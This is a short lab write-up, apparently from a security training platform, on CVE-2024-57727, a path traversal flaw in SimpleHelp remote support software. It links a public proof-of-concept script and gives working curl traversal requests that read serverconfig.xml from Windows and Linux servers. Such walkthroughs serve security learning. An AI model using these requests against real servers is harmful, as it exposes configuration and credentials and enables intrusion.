Simplehelp CVE-2024-57727

SimpleHelp is a system that facilitates remote support, access, and work, among other uses. It is mainly used by IT professionals and support teams to allow them to support their users remotely. It can be installed on Linux, MS Windows, and macOS servers.

CVE-2024-57727 for SimpleHelp is a path traversal vulnerability.

After various vulnerabilities affecting other remote support and remote access software were discovered, Horizon3.ai was curious to check SimpleHelp’s software. In their blog post, they state to have discovered three vulnerabilities: CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728

Vulnerability Check

We can check this vulnerability by using this exploit https://github.com/imjdl/CVE-2024-57727

python poc.py http://10.10.161.39

Exploitation (Windows Server)

We can exploit this by getting serverconfig.xml file

curl --path-as-is http://10.10.161.39/toolbox-resource/../resource1/../../configuration/serverconfig.xml

now we are able to access files on the server.

Exploitation (Linux Server)

curl --path-as-is http://10.10.206.185/toolbox-resource/../secmsg/../../configuration/serverconfig.xml

Last updated